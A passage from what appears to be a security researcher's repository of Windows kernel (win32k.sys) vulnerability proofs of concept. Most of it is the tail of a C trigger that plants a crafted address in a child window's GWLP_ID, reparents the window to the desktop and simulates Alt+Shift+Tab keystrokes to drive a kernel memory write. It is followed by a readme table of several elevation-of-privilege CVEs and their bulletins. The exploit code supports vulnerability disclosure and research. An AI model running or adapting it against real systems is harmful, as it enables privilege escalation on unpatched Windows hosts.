| hWndParent = CreateWindowExW( 174 | 0, 175 | pszClassName, 176 | NULL, 177 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 178 | 0, 179 | 0, 180 | 360, 181 | 360, 182 | NULL, 183 | NULL, 184 | GetModuleHandleW(NULL), 185 | NULL 186 | ); 187 | 188 | if (NULL == hWndParent) 189 | { 190 | break; 191 | } 192 | 193 | hWndChild = CreateWindowExW( 194 | 0, 195 | pszClassName, 196 | pszTitleName, 197 | WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, 198 | 0, 199 | 0, 200 | 160, 201 | 160, 202 | hWndParent, 203 | NULL, 204 | GetModuleHandleW(NULL), 205 | NULL 206 | ); 207 | 208 | if (NULL == hWndChild) 209 | { 210 | break; 211 | } 212 | 213 | #ifdef _WIN64 214 | pId = ( (UCHAR*)pAddress - 0x28 ); 215 | #else 216 | pId = ( (UCHAR*)pAddress - 0x14); 217 | #endif // #ifdef _WIN64 218 | 219 | SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); 220 | 221 | DbgPrint("hWndChild = 0x%p\n" , hWndChild); 222 | DebugBreak(); 223 | 224 | ShowWindow(hWndParent , SW_SHOWNORMAL); 225 | 226 | SetParent(hWndChild , GetDesktopWindow() ); 227 | 228 | SetForegroundWindow(hWndChild); 229 | 230 | _sim_alt_shift_tab(4); 231 | 232 | 
SwitchToThisWindow(hWndChild , TRUE); 233 | 234 | _sim_alt_shift_esc(); 235 | 236 | 237 | while( GetMessage(&stMsg , NULL , 0 , 0) ) 238 | { 239 | TranslateMessage(&stMsg); 240 | DispatchMessage(&stMsg); 241 | } 242 | 243 | 244 | } while (FALSE); 245 | 246 | if ( NULL != hWndParent ) 247 | { 248 | DestroyWindow(hWndParent); 249 | hWndParent = NULL; 250 | } 251 | 252 | if ( NULL != hWndChild ) 253 | { 254 | DestroyWindow(hWndChild); 255 | hWndChild = NULL; 256 | } 257 | 258 | UnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); 259 | 260 | return 0; 261 | } 262 | 263 | int __cdecl wmain(int nArgc, WCHAR** Argv) 264 | { 265 | do 266 | { 267 | or_address_value_4( (void*)0xFFFFFFFF ); 268 | } while (FALSE); 269 | 270 | return 0; 271 | } 272 | 273 | ``` 274 | 275 | ![](./capture.png) 276 | -------------------------------------------------------------------------------- /CVE-2016-7260/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-151](https://technet.microsoft.com/library/security/MS16-151) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # kernel vulnerability 2 | All of them except CVE-2016-7255 were found by me. 
3 | 4 | All of them were found by [javascript kernel fuzz](https://github.com/tinysec/public/tree/master/FuzzWindowsKernelViaJavascript) 5 | 6 | 7 | | CVE | MSID | type | module | object |comment 8 | | ------| ------ | ------ |------ | ------ | ------ 9 | | CVE-2016-0048 | [MS16-034](https://technet.microsoft.com/en-us/library/security/ms16-034.aspx) | out-of-band | win32k.sys | MSG | Elevation of Privilege 10 | | CVE-2016-0096 | [MS16-018](https://technet.microsoft.com/en-us/library/security/ms16-018.aspx) | type-confusion | win32k.sys | HWND | Elevation of Privilege 11 | | CVE-2016-3252 | [MS16-090](https://technet.microsoft.com/en-us/library/security/ms16-090.aspx) | out-of-band | win32k.sys | GDI | Elevation of Privilege 12 | | CVE-2016-7211 | [MS16-123](https://technet.microsoft.com/library/security/MS16-123) | use-after-free | win32k.sys | HDC | Elevation of Privilege 13 | | CVE-2016-7260 | [MS16-151](https://technet.microsoft.com/library/security/MS16-151) | out-of-band | win32k.sys | GDI | Elevation of Privilege 14 | 15 | --------------------------------------------------------------------------------